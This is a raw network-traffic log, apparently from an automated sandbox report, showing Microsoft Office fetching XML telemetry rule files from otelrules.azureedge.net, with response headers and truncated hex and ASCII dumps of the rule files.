                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:13 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                              ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                              x-ms-request-id: 40dbe65e-a01e-0050-4363-3bdb6e000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073113Z-178bfbc474bwh9gmhC1NYCy3rs00000001700000000083ka
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:13 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              139192.168.2.64991013.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:13 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:13 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:13 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1425
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                              ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                              x-ms-request-id: 5a5a1706-c01e-0079-6c8c-3ae51a000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073113Z-178bfbc474bwh9gmhC1NYCy3rs0000000180000000006udr
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:13 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              140192.168.2.64991213.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:13 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:13 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1415
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                              ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                              x-ms-request-id: 150e742e-301e-0033-3994-3bfa9c000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073113Z-r1d97b995777mdbwhC1TEBezag00000009yg00000000dhpu
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:13 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              141192.168.2.64991313.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:13 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:13 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:13 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1378
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                              ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                              x-ms-request-id: b5bbaf22-a01e-0070-528a-3b573b000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073113Z-1777c6cb7544n7p6hC1TEByvb40000000awg000000009m8m
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:13 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              142192.168.2.64991113.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:13 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:13 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1388
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                              ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                              x-ms-request-id: 607d0db8-301e-0052-4363-3b65d6000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073113Z-178bfbc474bscnbchC1NYCe7eg00000001b0000000004rg2
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:14 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              143192.168.2.64991413.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:15 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:15 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:15 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1405
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                              ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                              x-ms-request-id: 2e331142-b01e-001e-697c-3b0214000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073115Z-1777c6cb754mqztshC1TEB4mkc0000000axg000000000ya5
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:15 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              144192.168.2.64991513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:15 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:15 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1368
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                              ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                              x-ms-request-id: c70c13b9-401e-0064-2959-3b54af000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073115Z-178bfbc474btvfdfhC1NYCa2en0000000180000000005qbs
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:15 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              145192.168.2.64991613.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:15 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:16 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:15 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1415
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                              ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                              x-ms-request-id: 9616670f-801e-008c-16a7-3b7130000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073115Z-r1d97b995774n5h6hC1TEBvf840000000a2g0000000044c8
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:16 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              146192.168.2.64991713.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:15 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:16 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:16 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1378
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                              ETag: "0x8DC582BE584C214"
                                                                                                                                                                              x-ms-request-id: 36815d12-601e-0070-4763-3ba0c9000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073116Z-178bfbc474bvjk8shC1NYC83ns000000011g0000000045nn
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:16 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              147192.168.2.64991813.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:15 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:16 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:16 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1407
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                              ETag: "0x8DC582BE687B46A"
                                                                                                                                                                              x-ms-request-id: 9dcf90b9-e01e-000c-7364-3b8e36000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073116Z-178bfbc474btvfdfhC1NYCa2en000000014g00000000dvv1
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
